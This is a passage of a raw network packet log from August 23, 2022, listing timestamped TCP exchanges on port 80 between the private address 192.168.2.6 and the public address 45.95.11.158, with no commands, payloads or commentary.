                                                                                                                                                                      Aug 23, 2022 18:26:21.386537075 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.386550903 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.386569023 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.386579037 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.386604071 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.386614084 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.386621952 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.386657000 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.386662960 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.386709929 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.386740923 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.386759043 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.386766911 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.386797905 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.387027025 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.387056112 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.387075901 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.387108088 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.387116909 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.387123108 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.387159109 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.387192011 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.387212992 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.387217045 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.387236118 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.387265921 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.387274981 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.387279987 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.387331963 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.387372017 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.387418032 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.387434959 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.387464046 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.387473106 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.387499094 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.388681889 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.388711929 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.388765097 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.388823032 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.388889074 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.388930082 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.388956070 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.388984919 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.389023066 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.389069080 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.389085054 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.389100075 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.389133930 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.389167070 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.389175892 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.389177084 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.389228106 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.389241934 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.389308929 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.389374018 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.389553070 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.389601946 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.389605999 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.389616966 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.389647007 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.389663935 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.389671087 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.389766932 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.389776945 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.389858007 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.390045881 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.390074015 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.390098095 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.390134096 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.390150070 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.390177965 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.390218973 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.390229940 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.390243053 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.390304089 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.390305042 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.390374899 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.390450001 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.390510082 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.390558958 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.390623093 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.390633106 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.390649080 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.390697956 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.390705109 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.390713930 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.390722990 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.390769958 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.390769958 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.390778065 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.390980959 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.390995979 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.391062021 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.391280890 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.391379118 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.391432047 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.391478062 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.391531944 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.391562939 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.391603947 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.391617060 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.391632080 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.391654968 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.391690016 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.391717911 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.391732931 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.391762018 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.391772032 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.391778946 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.391823053 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.392010927 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.392074108 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.392075062 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.392082930 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.392112017 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.392144918 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.392164946 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.418448925 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.418476105 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.418575048 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.418596983 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.418643951 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.418664932 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.418669939 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.418670893 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.418731928 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.418746948 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.418816090 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.419007063 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.419080973 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.419086933 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.419141054 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.419188976 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.419193983 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.419197083 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.419260025 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.419269085 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.419322014 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.419383049 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.419389963 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.419408083 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.419454098 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.419493914 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.419507980 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.419519901 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.419573069 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.419614077 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.419637918 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.419645071 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.419647932 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.419656038 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.419697046 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.419764042 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.419773102 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.419780016 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.419814110 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.419862986 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.419883966 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.419888020 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.419928074 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.419948101 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.419989109 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.420046091 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.420053959 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.420069933 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.420099020 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.420141935 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.420145988 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.420150042 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.420188904 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.420224905 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.420228004 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.420238972 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.420264006 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.420300961 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.420305014 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.420310974 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.420351028 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.420401096 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.420413017 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.420427084 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.420428038 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.420476913 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.420514107 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.420516014 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.420543909 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.420556068 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.420561075 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.420562029 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.420612097 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.420624971 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.420661926 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.432785988 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.432847023 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.432924032 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.432940960 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.432951927 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.433002949 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.433022022 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.433082104 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.433120012 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.433121920 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.433130980 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.433172941 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.433199883 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.433233976 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.433254004 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.433269978 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.433271885 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.433310986 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.433353901 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.433377028 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.433423042 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.433453083 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.433459044 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.433491945 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.433537006 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.433558941 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.433597088 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.433614969 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.433619022 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.433646917 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.433691025 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.433707952 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.433763981 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.433804035 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.433845043 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.433864117 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.433886051 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.433896065 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.433950901 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.433952093 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.434005976 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.434011936 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.434052944 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.434052944 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.434096098 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.434133053 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.434138060 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.434144974 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.434190989 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.434230089 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.434236050 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.434259892 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.434309959 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.434346914 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.434346914 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.434354067 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.434396029 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.434433937 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.434437990 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.434444904 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.434483051 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.434520960 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.434525013 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.434534073 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.434587002 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.434633970 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.434638023 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.434638977 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.434709072 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.434714079 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.434756994 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.434792995 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.434798956 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.450818062 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.450855970 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.450896025 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.450923920 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.450958014 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.450984001 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.450994015 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.451010942 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.451020002 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.451031923 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.451035976 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.451045990 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.451047897 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.451100111 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.451126099 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.451160908 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.451189041 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.451195955 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.451200962 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.451212883 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.451227903 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.451251984 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.451283932 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.451286077 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.451296091 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.451308012 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.451313972 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:21.451339006 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:21.451428890 CEST4980080192.168.2.645.95.11.158
